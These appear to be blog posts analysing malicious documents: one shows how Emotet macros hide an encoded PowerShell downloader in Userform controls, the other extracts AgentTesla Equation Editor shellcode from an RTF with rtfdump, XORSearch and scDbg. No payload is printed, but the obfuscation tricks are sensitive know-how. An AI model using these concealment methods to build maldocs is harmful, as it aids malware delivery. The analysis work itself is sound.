SHA256: 12A9D51F23B64A1C6DC2146C8325AD73C6810CCDA73586EEF181C4CDDB309A99

Where We’ve Been

If you are familiar with the typical behavior of an Emotet document at all, you expect WINWORD.exe or WmiPrvSE.exe to spawn powershell.exe and pass it a big string of base64 encoded text. That base64 string decodes to a variety of commands that attempt to download an .exe from one of five URLs.

Yet, where does that string live in the malicious document? Sometimes it is scattered all over the macro before it gets concatenated. Here’s an Emotet sample from February 2019. It is quite easy to see how the powershell command and the base64 string get assembled.

At other times, the macro references and grabs strings from a Userform. In this example from May 2019, we see two Userforms named F82063 and N9_9818.

Can someone ask Microsoft to give Snip & Sketch the ability to draw straight lines?

Notice how the macro references components within that Userform. While we can see only one empty box within the Userform above, there are really a stack of them on top of each other. They each have their own name and contain some sort of text. Again, it is not too difficult to see how they will get rearranged into the familiar “powershell -e JAB…”

Where We Are Today

Emotet documents are still making use of Userforms, but with a minor twist. In this sample, the long string is brought back into the macro, split apart, and then joined to create the “powershell -e JAB…” string.

These are all of the components in the Userform named woicroib. It contains a variety of ComboBoxes, Frames, and even a MultiPage.

This macro line below references the Userform containing the encoded text. woicroib is the name of the Userform. raopfeukchaup is a MultiPage component within the Userform. raopfeukchaup contains two pages. The ControlTipText is then grabbed from the second page. However, it looks like that box is empty.

But this is not the case. If we put a cursor in there, select all of it (ctrl + A) and then copy (ctrl + C) and paste it in notepad, we get this giant string. How is it going to be used in the macro?

Returning back to the macro, the above string is tossed into variable io (line 66). This becomes the parameter used in function chiexbeachjeuhkiam (lines 69 and 49). The entire string above is split (line 53) on another string of characters and then joined back together in line 59.

We can emulate this behavior quite easily. Within our notepad document, we can do a simple search for the string in line 53 above and when we replace all of them with nothing…

… we get the powershell string!
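Splitting on a separator and joining the pieces back together with nothing in between is the same as deleting every copy of the separator, which is why the Notepad replace works. A Python sketch, assuming an empty joiner; the separator in the usage below is a made-up placeholder, not the one from the sample.

```python
def split_join(blob: str, separator: str, joiner: str = "") -> str:
    """Mimic VBA's Join(Split(blob, separator), joiner)."""
    return joiner.join(blob.split(separator))


def replace_emulation(blob: str, separator: str) -> str:
    """The Notepad shortcut: replace every separator with nothing."""
    return blob.replace(separator, "")
```

With an empty joiner, split_join and replace_emulation always return the same string.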

And as my calculus teacher in college used to say, we’ve reduced this to a previously solved problem.

Thanks for reading!

AgentTesla: .rtf and Equation Editor

While extracting Equation Editor shellcode is nothing new on this blog, it never hurts to practice the skills necessary to do this. To that end, we will be working on this document right here: https://app.any.run/tasks/0a1096aa-339e-4602-a3e0-2496a07efea4

.rtf document?

Using rtfdump.py against the document, we see that item 8 contains objdata. This is a good place to start.

We can select item 8 (-s) and decode it as hexadecimal data (-H) in order to take an initial look at that object. We can see that this object contains a call to Equation Editor (EQNEDT32.exe).

To extract this as a file, we will decode it as hexadecimal (-H), dump it (-d), and then send the output to another file which we will call output.bin.
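rtfdump handles the messy parts of RTF for us. As an illustration of what the hex decoding amounts to, here is a naive Python sketch: it finds the first \objdata control word, drops any other control words, keeps the hex digits up to the next closing brace, and decodes them. Real maldocs often obfuscate RTF in ways this does not handle, so treat it as a teaching aid rather than a replacement for rtfdump.py; extract_objdata is a hypothetical name.

```python
import re

CONTROL_WORD = re.compile(rb"\\[A-Za-z]+-?\d* ?")
HEX_DIGIT = re.compile(rb"[0-9A-Fa-f]")


def extract_objdata(rtf: bytes) -> bytes:
    """Naively decode the hex payload of the first \\objdata destination."""
    start = rtf.find(b"\\objdata")
    if start == -1:
        raise ValueError("no \\objdata control word found")
    start += len(b"\\objdata")
    end = rtf.find(b"}", start)
    body = rtf[start:] if end == -1 else rtf[start:end]
    body = CONTROL_WORD.sub(b"", body)          # drop stray control words
    digits = b"".join(HEX_DIGIT.findall(body))  # ignore whitespace and junk
    if len(digits) % 2:
        digits = digits[:-1]                    # drop a dangling nibble
    return bytes.fromhex(digits.decode("ascii"))
```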

We can use XORSearch.exe to search that binary file for various signatures of 32-bit shellcode. We see that GetEIP was found in two locations. This indicates that shellcode might start at 0xF2. This information will be useful in the next step.


scDbg.exe is a shellcode emulator. If we load up our .bin file and start with the offset of 0xF2, decoded shellcode may appear.

Based on the output, it looks like we had a good offset address. We can tell because we see some decoded lines… but not too many decoded lines. However, we’ve seen ExpandEnvironmentStringsW before and we know how to deal with that. Notice also where it says “Change found at 706…” and that it dumped to a new file called output.unpack.

The change was found at position 706. This means that there are a bunch of extraneous characters before our useful shellcode. While there are a variety of ways to get rid of them, cut-bytes.py will also do the trick.

We can see a variety of useful strings by opening output-cut.unpack in a hex editor.

One of the reasons we didn’t get this output before was that the shellcode used ExpandEnvironmentStringsW. scDbg.exe doesn’t hook into that function. Instead, it will hook into ExpandEnvironmentStringsA. If we overwrite the W in our file with an A, we ought to be able to get some much cleaner output.

Save your changes and toss it back into scDbg.exe. Note, there is no need to include an offset address or create a dump.

We now have the decoded shellcode!

Thanks for reading!